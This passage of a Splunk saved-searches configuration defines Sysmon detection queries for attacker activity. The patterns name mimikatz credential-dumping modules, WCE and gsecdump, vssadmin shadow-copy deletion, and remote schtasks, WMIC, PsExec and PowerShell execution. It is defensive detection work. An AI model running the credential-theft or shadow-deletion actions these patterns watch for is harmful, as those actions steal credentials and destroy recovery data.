display.visualizations.show = 0 117 | request.ui_dispatch_app = sysmon-splunk-app 118 | request.ui_dispatch_view = search 119 | search = `sysmon` | stats values(CommandLine) by Computer,process 120 | 121 | [Net - Group, localgroup] 122 | action.email.useNSSubject = 1 123 | alert.track = 0 124 | dispatchAs = user 125 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 126 | display.general.type = statistics 127 | display.page.search.mode = verbose 128 | display.page.search.tab = statistics 129 | display.visualizations.charting.chart = bar 130 | display.visualizations.show = 0 131 | request.ui_dispatch_app = sysmon-splunk-app 132 | request.ui_dispatch_view = search 133 | search = `sysmon` process="net.exe" (CommandLine="*net group*" OR CommandLine="*net localgroup*") | stats count by Computer,CommandLine 134 | 135 | [Users by Computer] 136 | action.email.useNSSubject = 1 137 | alert.track = 0 138 | dispatchAs = user 139 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 140 | display.general.type = statistics 141 | display.page.search.mode = verbose 142 | display.page.search.tab = statistics 143 | display.visualizations.charting.chart = bar 144 | display.visualizations.show = 0 145 | request.ui_dispatch_app = sysmon-splunk-app 146 | request.ui_dispatch_view = search 147 | search = `sysmon` | stats values(user) by Computer 148 | 149 | [Commandline by user] 150 | action.email.useNSSubject = 1 151 | alert.track = 0 152 | dispatchAs = user 153 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 154 | display.general.type = statistics 155 | display.page.search.mode = verbose 156 | display.page.search.tab = statistics 157 | display.visualizations.charting.chart = bar 158 | display.visualizations.show = 0 159 | request.ui_dispatch_app = sysmon-splunk-app 160 | request.ui_dispatch_view = search 161 | search = `sysmon` | stats values(CommandLine) by user 162 | 163 | [Net - net view] 164 | action.email.useNSSubject = 1 165 | alert.track = 0 166 | dispatchAs = user 167 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 168 | display.general.type = statistics 169 | display.page.search.mode = verbose 170 | display.page.search.tab = statistics 171 | display.visualizations.charting.chart = bar 172 | display.visualizations.show = 0 173 | request.ui_dispatch_app = sysmon-splunk-app 174 | request.ui_dispatch_view = search 175 | search = `sysmon` process=net.exe (CommandLine="net view") | stats count by Computer,CommandLine 176 | 177 | [Windows Credential Editor] 178 | action.email.useNSSubject = 1 179 | alert.track = 0 180 | dispatch.earliest_time = -24h@h 181 | dispatch.latest_time = now 182 | dispatchAs = user 183 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 184 | display.page.search.mode = verbose 185 | display.visualizations.charting.chart = bar 186 | display.visualizations.show = 0 187 | request.ui_dispatch_app = sysmon-splunk-app 188 | request.ui_dispatch_view = search 189 | search = `sysmon` ParentImage="services.exe" | regex CommandLine="\\\\[a-z0-9]{8}-[a-z0-9]{4}-[az0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}\.exe-S$" 190 | 191 | [mimikatz] 192 | action.email.useNSSubject = 1 193 | alert.track = 0 194 | dispatch.earliest_time = -24h@h 195 | dispatch.latest_time = now 196 | dispatchAs = user 197 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 198 | display.page.search.mode = verbose 199 | display.visualizations.charting.chart = bar 200 | display.visualizations.show = 0 201 | request.ui_dispatch_app = sysmon-splunk-app 202 | request.ui_dispatch_view = search 203 | search = `sysmon` CommandLine="*privileges::debug*" OR CommandLine="*sekurlsa::*" OR CommandLine="*kerberos::*" OR CommandLine="*crypto::*" OR CommandLine="*lsadump::*" OR CommandLine="*process::*" 204 | 205 | [gsecdump] 206 | action.email.useNSSubject = 1 207 | alert.track = 0 208 | dispatch.earliest_time = -24h@h 209 | dispatch.latest_time = now 210 | dispatchAs = user 211 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 212 | display.page.search.mode = verbose 213 | display.visualizations.charting.chart = bar 214 | display.visualizations.show = 0 215 | request.ui_dispatch_app = sysmon-splunk-app 216 | request.ui_dispatch_view = search 217 | search = `sysmon` process="g64-*" | regex process="\\\\g64-[a-z0-9]{3}\.exe$" 218 | 219 | [wmic - process call create] 220 | action.email.useNSSubject = 1 221 | alert.track = 0 222 | dispatch.earliest_time = -24h@h 223 | dispatch.latest_time = now 224 | dispatchAs = user 225 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 226 | display.page.search.mode = verbose 227 | display.visualizations.charting.chart = bar 228 | display.visualizations.show = 0 229 | request.ui_dispatch_app = sysmon-splunk-app 230 | request.ui_dispatch_view = search 231 | search = `sysmon` process="WMIC.exe" CommandLine="*process call create*" 232 | 233 | [wmiprvse - parent execution] 234 | action.email.useNSSubject = 1 235 | alert.track = 0 236 | dispatch.earliest_time = -24h@h 237 | dispatch.latest_time = now 238 | dispatchAs = user 239 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 240 | display.general.type = statistics 241 | display.page.search.mode = verbose 242 | display.page.search.tab = statistics 243 | display.visualizations.charting.chart = bar 244 | display.visualizations.show = 0 245 | request.ui_dispatch_app = sysmon-splunk-app 246 | request.ui_dispatch_view = search 247 | search = `sysmon` ParentImage="WmiPrvSE.exe" | stats count by Computer,CommandLine 248 | 249 | [wmic - /node] 250 | action.email.useNSSubject = 1 251 | alert.track = 0 252 | dispatch.earliest_time = -24h@h 253 | dispatch.latest_time = now 254 | dispatchAs = user 255 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 256 | display.page.search.mode = verbose 257 | display.visualizations.charting.chart = bar 258 | display.visualizations.show = 0 259 | request.ui_dispatch_app = sysmon-splunk-app 260 | request.ui_dispatch_view = search 261 | search = `sysmon` process="WMIC.exe" CommandLine="*/NODE:*" 262 | 263 | [vssadmin - delete] 264 | action.email.useNSSubject = 1 265 | alert.track = 0 266 | dispatchAs = user 267 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 268 | display.page.search.mode = verbose 269 | display.visualizations.charting.chart = bar 270 | display.visualizations.show = 0 271 | request.ui_dispatch_app = sysmon-splunk-app 272 | request.ui_dispatch_view = search 273 | search = `sysmon` EventCode=1 process=vssadmin.exe | search CommandLine="*vssadmin*" CommandLine="*Delete *" CommandLine="*Shadows*" 274 | 275 | [taskeng - parentproc all] 276 | action.email.useNSSubject = 1 277 | alert.track = 0 278 | dispatch.earliest_time = -24h@h 279 | dispatch.latest_time = now 280 | dispatchAs = user 281 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 282 | display.general.type = statistics 283 | display.page.search.mode = verbose 284 | display.page.search.tab = statistics 285 | display.visualizations.charting.chart = bar 286 | display.visualizations.show = 0 287 | request.ui_dispatch_app = sysmon-splunk-app 288 | request.ui_dispatch_view = search 289 | search = `sysmon` ParentImage="taskeng.exe" | stats count by Computer,CommandLine 290 | 291 | [schtasks - run] 292 | action.email.useNSSubject = 1 293 | alert.track = 0 294 | dispatch.earliest_time = -24h@h 295 | dispatch.latest_time = now 296 | dispatchAs = user 297 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 298 | display.page.search.mode = verbose 299 | display.visualizations.charting.chart = bar 300 | display.visualizations.show = 0 301 | request.ui_dispatch_app = sysmon-splunk-app 302 | request.ui_dispatch_view = search 303 | search = `sysmon` process="schtasks.exe" CommandLine="*/Run*" CommandLine="*/s *" 304 | 305 | [schtasks - delete] 306 | action.email.useNSSubject = 1 307 | alert.track = 0 308 | dispatch.earliest_time = -24h@h 309 | dispatch.latest_time = now 310 | dispatchAs = user 311 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 312 | display.page.search.mode = verbose 313 | display.visualizations.charting.chart = bar 314 | display.visualizations.show = 0 315 | request.ui_dispatch_app = sysmon-splunk-app 316 | request.ui_dispatch_view = search 317 | search = `sysmon` process="schtasks.exe" CommandLine="*/Delete*" CommandLine="*/s *" 318 | 319 | [schtasks - create] 320 | action.email.useNSSubject = 1 321 | alert.track = 0 322 | dispatch.earliest_time = -24h@h 323 | dispatch.latest_time = now 324 | dispatchAs = user 325 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 326 | display.page.search.mode = verbose 327 | display.visualizations.charting.chart = bar 328 | display.visualizations.show = 0 329 | request.ui_dispatch_app = sysmon-splunk-app 330 | request.ui_dispatch_view = search 331 | search = `sysmon` process="schtasks.exe" CommandLine="*/Create*" CommandLine="*/s *" 332 | 333 | [schtasks - change] 334 | action.email.useNSSubject = 1 335 | alert.track = 0 336 | dispatch.earliest_time = -24h@h 337 | dispatch.latest_time = now 338 | dispatchAs = user 339 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 340 | display.page.search.mode = verbose 341 | display.visualizations.charting.chart = bar 342 | display.visualizations.show = 0 343 | request.ui_dispatch_app = sysmon-splunk-app 344 | request.ui_dispatch_view = search 345 | search = `sysmon` process="schtasks.exe" CommandLine="*/Change*" CommandLine="*/s *" 346 | 347 | [schtasks - all] 348 | action.email.useNSSubject = 1 349 | alert.track = 0 350 | dispatch.earliest_time = -24h@h 351 | dispatch.latest_time = now 352 | dispatchAs = user 353 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 354 | display.general.type = statistics 355 | display.page.search.mode = verbose 356 | display.page.search.tab = statistics 357 | display.visualizations.charting.chart = bar 358 | display.visualizations.show = 0 359 | request.ui_dispatch_app = sysmon-splunk-app 360 | request.ui_dispatch_view = search 361 | search = `sysmon` process="schtasks.exe"| stats count by Computer,CommandLine 362 | 363 | [rundll32 - suspicious execution] 364 | action.email.useNSSubject = 1 365 | alert.track = 0 366 | dispatch.earliest_time = -24h@h 367 | dispatch.latest_time = now 368 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 369 | display.page.search.mode = verbose 370 | display.visualizations.charting.chart = bar 371 | display.visualizations.show = 0 372 | request.ui_dispatch_app = sysmon-splunk-app 373 | request.ui_dispatch_view = search 374 | search = `sysmon` EventCode=1 rundll32.exe \ 375 | | search Image="rundll32.exe" (CommandLine="AppData\\Local\\Temp*" CommandLine="*qwerty*") \ 376 | OR (ParentImage="winword.exe" \ 377 | OR ParentImage="excel.exe" OR ParentImage="cscript.exe" \ 378 | OR ParentImage="wscript.exe" OR ParentImage="mshta.exe") 379 | 380 | [psexecsvc - all] 381 | action.email.useNSSubject = 1 382 | alert.track = 0 383 | dispatchAs = user 384 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 385 | display.general.type = statistics 386 | display.page.search.mode = verbose 387 | display.page.search.tab = statistics 388 | display.visualizations.charting.chart = bar 389 | display.visualizations.show = 0 390 | request.ui_dispatch_app = sysmon-splunk-app 391 | request.ui_dispatch_view = search 392 | search = `sysmon` ParentImage="PSEXESVC.EXE" | stats count by Image,Hashes 393 | 394 | [psexec - IMPHASH not psexec.exe] 395 | action.email.useNSSubject = 1 396 | alert.track = 0 397 | dispatch.earliest_time = -24h@h 398 | dispatch.latest_time = now 399 | dispatchAs = user 400 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 401 | display.page.search.mode = verbose 402 | display.visualizations.charting.chart = bar 403 | display.visualizations.show = 0 404 | request.ui_dispatch_app = sysmon-splunk-app 405 | request.ui_dispatch_view = search 406 | search = `sysmon` Hashes="*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*" NOT process="*PsExec.exe" 407 | 408 | [psexec - IMPHASH] 409 | action.email.useNSSubject = 1 410 | alert.track = 0 411 | dispatch.earliest_time = -24h@h 412 | dispatch.latest_time = now 413 | dispatchAs = user 414 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 415 | display.page.search.mode = verbose 416 | display.visualizations.charting.chart = bar 417 | display.visualizations.show = 0 418 | request.ui_dispatch_app = sysmon-splunk-app 419 | request.ui_dispatch_view = search 420 | search = `sysmon` Hashes="*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*" 421 | 422 | [powershell - invoke-command] 423 | action.email.useNSSubject = 1 424 | alert.track = 0 425 | dispatch.earliest_time = -24h@h 426 | dispatch.latest_time = now 427 | dispatchAs = user 428 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 429 | display.page.search.mode = verbose 430 | display.visualizations.charting.chart = bar 431 | display.visualizations.show = 0 432 | request.ui_dispatch_app = sysmon-splunk-app 433 | request.ui_dispatch_view = search 434 | search = `sysmon` process="*powershell.exe" CommandLine="*Invoke-Command*" 435 | 436 | [at execution] 437 | action.email.useNSSubject = 1 438 | alert.track = 0 439 | dispatch.earliest_time = -24h@h 440 | dispatch.latest_time = now 441 | dispatchAs = user 442 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 443 | display.general.type = statistics 444 | display.page.search.mode = verbose 445 | display.page.search.tab = statistics 446 | display.visualizations.charting.chart = bar 447 | display.visualizations.show = 0 448 | request.ui_dispatch_app = sysmon-splunk-app 449 | request.ui_dispatch_view = search 450 | search = `sysmon` ParentImage="at.exe" | stats count by Computer,CommandLine 451 | 452 | [wsmprovhost - powershell] 453 | action.email.useNSSubject = 1 454 | alert.track = 0 455 | dispatch.earliest_time = -24h@h 456 | dispatch.latest_time = now 457 | dispatchAs = user 458 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 459 | display.general.type = statistics 460 | display.page.search.mode = verbose 461 | display.page.search.tab = statistics 462 | display.visualizations.charting.chart = bar 463 | display.visualizations.show = 0 464 | request.ui_dispatch_app = sysmon-splunk-app 465 | request.ui_dispatch_view = search 466 | search = `sysmon` ParentImage="*wsmprovhost.exe" | stats count by Computer,CommandLine 467 | 468 | [msbuild - all] 469 | action.email.useNSSubject = 1 470 | alert.track = 0 471 | dispatch.earliest_time = -24h@h 472 | dispatch.latest_time = now 473 | dispatchAs = user 474 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 475 | display.general.type = statistics 476 | display.page.search.mode = verbose 477 | display.page.search.tab = statistics 478 | display.visualizations.charting.chart = bar 479 | display.visualizations.show = 0 480 | request.ui_dispatch_app = sysmon-splunk-app 481 | request.ui_dispatch_view = search 482 | search = `sysmon` process="msbuild.exe"| stats count by Computer,CommandLine 483 | 484 | [rundll32.exe - all] 485 | action.email.useNSSubject = 1 486 | alert.track = 0 487 | dispatch.earliest_time = -24h@h 488 | dispatch.latest_time = now 489 | dispatchAs = user 490 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 491 | display.general.type = statistics 492 | display.page.search.mode = verbose 493 | display.page.search.tab = statistics 494 | display.visualizations.charting.chart = bar 495 | display.visualizations.show = 0 496 | request.ui_dispatch_app = sysmon-splunk-app 497 | request.ui_dispatch_view = search 498 | search = `sysmon` process="rundll32.exe"| stats count by Computer,CommandLine 499 | 500 | [rundll32.exe - Control_RunDLL] 501 | action.email.useNSSubject = 1 502 | alert.track = 0 503 | dispatch.earliest_time = -24h@h 504 | dispatch.latest_time = now 505 | dispatchAs = user 506 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 507 | display.general.type = statistics 508 | display.page.search.mode = verbose 509 | display.page.search.tab = statistics 510 | display.visualizations.charting.chart = bar 511 | display.visualizations.show = 0 512 | request.ui_dispatch_app = sysmon-splunk-app 513 | request.ui_dispatch_view = search 514 | search = `sysmon` process="rundll32.exe" CommandLine="*,Control_RunDLL"| stats count by Computer,CommandLine 515 | 516 | [rundll32.exe - DllRegisterServer] 517 | action.email.useNSSubject = 1 518 | alert.track = 0 519 | dispatch.earliest_time = -24h@h 520 | dispatch.latest_time = now 521 | dispatchAs = user 522 | display.events.fields = 